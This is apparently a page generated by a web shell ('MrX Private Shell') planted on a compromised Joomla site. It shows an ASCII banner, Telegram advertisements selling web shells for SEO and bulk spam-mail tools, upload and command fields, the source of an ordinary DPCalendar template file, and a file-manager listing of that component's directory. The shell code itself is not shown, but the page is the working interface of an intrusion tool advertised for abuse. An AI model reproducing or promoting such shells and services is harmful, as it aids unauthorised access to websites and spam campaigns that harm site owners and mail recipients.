__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
<?php
/**
 * @package   DPCalendar
 * @copyright Copyright (C) 2017 Digital Peak GmbH. <https://www.digital-peak.com>
 * @license   https://www.gnu.org/licenses/gpl-3.0.html GNU/GPL
 */

\defined('_JEXEC') or die();

use DigitalPeak\Component\DPCalendar\Administrator\Helper\DPCalendarHelper;
use DigitalPeak\Component\DPCalendar\Administrator\HTML\Block\Icon;
?>
<div class="com-dpcalendar-blog__actions dp-button-bar dp-print-hide">
	<div class="dp-button-bar__navigation">
		<button type="button" class="dp-button dp-button-action dp-button-prev" data-href="<?php echo $this->prevLink; ?>"
				aria-label="<?php echo $this->translate('COM_DPCALENDAR_PREVIOUS'); ?>">
			<?php echo $this->layoutHelper->renderLayout('block.icon', ['icon' => Icon::BACK]); ?>
		</button>
		<button type="button" class="dp-button dp-button-action dp-button-next" data-href="<?php echo $this->nextLink; ?>"
				aria-label="<?php echo $this->translate('COM_DPCALENDAR_NEXT'); ?>">
			<?php echo $this->layoutHelper->renderLayout('block.icon', ['icon' => Icon::NEXT]); ?>
		</button>
	</div>
	<div class="dp-button-bar__title dp-title">
		<span class="dp-title__start"><?php echo $this->startDate->format($this->params->get('list_title_format', 'j.n.Y')); ?></span>
		<span class="dp-title__separator"> - </span>
		<span class="dp-title__end"><?php echo $this->endDate->format($this->params->get('list_title_format', 'j.n.Y')); ?></span>
	</div>
	<div class="dp-button-bar__actions">
		<?php if (DPCalendarHelper::canCreateEvent()) { ?>
			<button type="button" class="dp-button dp-button-action dp-button-create"
					data-href="<?php echo $this->router->getEventFormRoute(0, $this->returnPage); ?>">
				<?php echo $this->layoutHelper->renderLayout('block.icon', ['icon' => Icon::PLUS]); ?>
				<?php echo $this->translate('JACTION_CREATE'); ?>
			</button>
		<?php } ?>
		<?php if ($this->params->get('list_show_print', 1)) { ?>
			<button type="button" class="dp-button dp-button-print" data-selector=".com-dpcalendar-blog">
				<?php echo $this->layoutHelper->renderLayout('block.icon', ['icon' => Icon::PRINTING]); ?>
				<?php echo $this->translate('COM_DPCALENDAR_VIEW_CALENDAR_TOOLBAR_PRINT'); ?>
			</button>
		<?php } ?>
		<?php if ($this->params->get('list_filter_form', 1)) { ?>
			<button type="button" class="dp-button dp-button-search">
				<?php echo $this->layoutHelper->renderLayout('block.icon', ['icon' => Icon::FILTER]); ?>
				<?php echo $this->translate('COM_DPCALENDAR_VIEW_CALENDAR_TOOLBAR_FILTER'); ?>
			</button>
		<?php } ?>
	</div>
</div>

Filemanager

Name Type Size Permission Actions
blog.php File 1.39 KB 0664
blog.xml File 41.18 KB 0664
blog_events.php File 4.76 KB 0664
blog_events_cta.php File 885 B 0664
blog_events_image.php File 863 B 0664
blog_events_locations.php File 1.57 KB 0664
blog_events_prices.php File 1.17 KB 0664
blog_events_title.php File 1.29 KB 0664
blog_form.php File 767 B 0664
blog_header.php File 2.49 KB 0664
blog_heading.php File 440 B 0664
blog_map.php File 831 B 0664
default.php File 1.4 KB 0664
default.xml File 41.51 KB 0664
default_events.php File 4.87 KB 0664
default_events_cta.php File 885 B 0664
default_events_image.php File 863 B 0664
default_events_locations.php File 1.57 KB 0664
default_events_prices.php File 1.17 KB 0664
default_events_title.php File 1.29 KB 0664
default_form.php File 755 B 0664
default_header.php File 2.49 KB 0664
default_heading.php File 440 B 0664
default_map.php File 831 B 0664
timeline.php File 1.41 KB 0664
timeline.xml File 41.11 KB 0664
timeline_events.php File 5.13 KB 0664
timeline_events_cta.php File 885 B 0664
timeline_events_image.php File 863 B 0664
timeline_events_locations.php File 1.57 KB 0664
timeline_events_prices.php File 1.17 KB 0664
timeline_events_title.php File 1.39 KB 0664
timeline_form.php File 771 B 0664
timeline_header.php File 2.5 KB 0664
timeline_heading.php File 444 B 0664
timeline_map.php File 835 B 0664
Filemanager